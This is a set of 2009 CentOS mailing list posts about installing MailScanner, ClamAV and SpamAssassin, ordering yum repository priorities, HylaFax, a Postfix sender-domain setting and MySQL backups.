Craig White wrote on Fri, 27 Feb 2009 07:46:47 -0700: you can get clam* and newer spamassassin rpms from rpmforge I suggest rolling your own SA. It's as simple as downloading the tarball and rebuilding it with the included spec file. It's a simple one-line command and documented on the download site. I suggest it because the rpmforge SA package pulls in unnecessary dependencies and has one or two problematic config options set if I remember right. clamav from rpmforge is just fine. Mailscanner can be easily installed from the repo Dan already mentioned. Kai Thanx kal. i have done that. got mailscanner installed. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
[CentOS] mailscanner installation - centos 5.2 - rpmforge + vanderkooij rpms
Guys, i have just installed ( after reading the docs on the mailscanner site and centos lists ) Mailscanner, and was wondering a.) How do i test my installation? is there some sample spam/ virus messages that can be used to test. b.) MailScanner -V shows; b.1) LibClamAV Warning: ** LibClamAV Warning: *** The virus database is older than 7 days! *** LibClamAV Warning: *** Please update it as soon as possible.*** LibClamAV Warning: ** how do i update this database? b.2) there are some modules missing; how do i iinstall them or do i ignore them Module versions are: 1.00AnyDBM_File 1.16Archive::Zip 0.17bignum 1.04Carp 1.42Compress::Zlib 1.119 Convert::BinHex missing Convert::TNEF --- missing ? 2.121_08Data::Dumper 2.27Date::Parse 1.00DirHandle 1.05Fcntl Optional module versions are: 1.30Archive::Tar 0.17bignum missing Business::ISBN missing ? missing Business::ISBN::Data missing Data::Dump 1.814 DB_File 1.14DBD::SQLite 1.52DBI 1.14Digest 1.01Digest::HMAC 2.36Digest::MD5 2.11Digest::SHA1 missing Encode::Detect missing Error missing ExtUtils::CBuilder missing ExtUtils::ParseXS regards, mgomez. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
[CentOS] centos 5.2 - latest rpms for mailcanner , clamav and spamassassin
Guys, What repo has rpms for mailscanner, clamav and spamassasin? ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
[CentOS] Repo order - priority plugins
Guys, what is the best way of arranging the repos with regards to their priority? Any ideas, especially for all non base ones? /etc/yum.repos.d/CentOS-Base.repo - priority = 1, 2 /etc/yum.repos.d/atrpms.repo /etc/yum.repos.d/epel.repo /etc/yum.repos.d/kbs-extras.repo /etc/yum.repos.d/kbs-misc.repo /etc/yum.repos.d/rpmforge.repo How would we position dags repo? ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] centos 5.2 - latest rpms for mailcanner , clamav and spamassassin
Guys, acording to the quickinstall.txt guide on the mailscanner site, there is an install.sh file which installs the mailscanner rpm, all the other perl rpms. Additionally, the site has also clam av and spamassassin installers too? any experience on these things? could just forego the rpms from the rpmforge repo? - Original Message From: Ned Slider n...@unixmail.co.uk Linux Advocate wrote: Guys, What repo has rpms for mailscanner, clamav and spamassasin? RPMforge has clamav and spamassassin, but not mailscanner. Mailscanner has RPMs available on their site. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Repo order - priority plugins
replies below... On 2/27/09, Linux Advocate wrote: Guys, what is the best way of arranging the repos with regards to their priority? Any ideas, especially for all non base ones? /etc/yum.repos.d/CentOS-Base.repo - priority = 1, 2 /etc/yum.repos.d/atrpms.repo /etc/yum.repos.d/epel.repo /etc/yum.repos.d/kbs-extras.repo /etc/yum.repos.d/kbs-misc.repo /etc/yum.repos.d/rpmforge.repo How would we position dags repo? Check out this URL: http://wiki.centos.org/PackageManagement/Yum/Priorities have read it previously, the issue is Third Party Repos ... priority=N (where N is 10 and based on your preference) i just wanted to get an idea of what other were doing, like for example, between the epel, dag, rpmforge, atrpm repos? any thoughts? or we do adjust the priorities according to various installation needs? ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Repo order - priority plugins
On Fri, Feb 27, 2009 at 9:09 AM, Lanny Marcus wrote: On 2/27/09, Linux Advocate wrote: Guys, what is the best way of arranging the repos with regards to their priority? Any ideas, especially for all non base ones? /etc/yum.repos.d/CentOS-Base.repo - priority = 1, 2 /etc/yum.repos.d/atrpms.repo /etc/yum.repos.d/epel.repo /etc/yum.repos.d/kbs-extras.repo /etc/yum.repos.d/kbs-misc.repo /etc/yum.repos.d/rpmforge.repo How would we position dags repo? Check out this URL: http://wiki.centos.org/PackageManagement/Yum/Priorities I'm not sure that was the question. I think the OP wants to know in what order he should prioritize all those repos. To which I say: What the heck do you need that many repos for in the first place? Mixing third party repos is usually problematic, even if properly prioritized. It becomes a dependency nightmare. If you really need those repos, I would install them, but configure them with enabled=0 and manually enable them on the yum command line only when needed. Perhaps a little background would help. What services do you need from all of those repos? Are you running a do-everything desktop machine, or servers? Have you considered virtualization as a way to isolate the instances where third party packages are needed? jeff, your questions have created some clarity for me. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] HylaFax and Com Ports
On Thu, Feb 26, 2009, Joseph L. Casale wrote: I need to setup HylaFax which leads to my first question, anyone got an opinion on whether or not to use HylaFax or HylaFax+? We use Hylafax together with Avantfax and are very pleased with the results. I cannot speak to HylaFax+ . We also use MultiTech MT5634ZBAs and have been very pleased with them as well. They must be ten years old by now. Avantfax is well worth a look if you are considering a web based solution for end user access to hylafax. definitely hylafax+ for me. i have used hylafax a few times and hylafax+ saved the day. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Repo order - priority plugins
Thanx kal, and to all who replied. i have understood the issue better. /etc/yum.repos.d/atrpms.repo /etc/yum.repos.d/epel.repo /etc/yum.repos.d/kbs-extras.repo /etc/yum.repos.d/kbs-misc.repo /etc/yum.repos.d/rpmforge.repo you can put rpmforge at 10 and epel and atrpms somewhere at 20, depends on what you need. I use rpmforge for maybe 98% of my extra packages on CentOS 5 and used EPEL and atrpms only for a few special packages, so i have them not enabled normally. I think I don't use kbs at all. I used it for CentoS 4, but for 5 I think rpmforge is better and I got the impression that Karanbir is pushing people towards it, anyway. Kai ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Mail from domain problem
in /etc/postfix/main.cf , set myorigin=$mydomain and not as $myhostname. From: Xia Guowen xi...@51poi.com To: centos@centos.org Sent: Tuesday, February 24, 2009 2:07:38 PM Subject: [CentOS] Mail from domain problem Hi, I installed a CentOS 4.7 server, the system information is: # cat /etc/sysconfig/network NETWORKING=yes HOSTNAME=mail.domain11.com # hostname mail.domain11.com #echo test | mail -s test mail some...@domain22.com I would like to receive mail is r...@domain11.com, but I received is r...@mail.domain11.com How to correct it? (I've tested there is no problem in CentOS 5.2) Best regards ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] realtime backup
- Original Message From: John Doe jd...@yahoo.com To: CentOS mailing list centos@centos.org Sent: Wednesday, February 18, 2009 5:40:48 PM Subject: Re: [CentOS] realtime backup From: CentOS List I had a cfml application running on mysql database. Can some suggest a realtime backup solution via ftp say every 5mins without damaging the database? Wouldn't a simple mysqldump work? http://dev.mysql.com/doc/refman/5.0/en/mysqldump.html JD not if there are innodb tables? ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
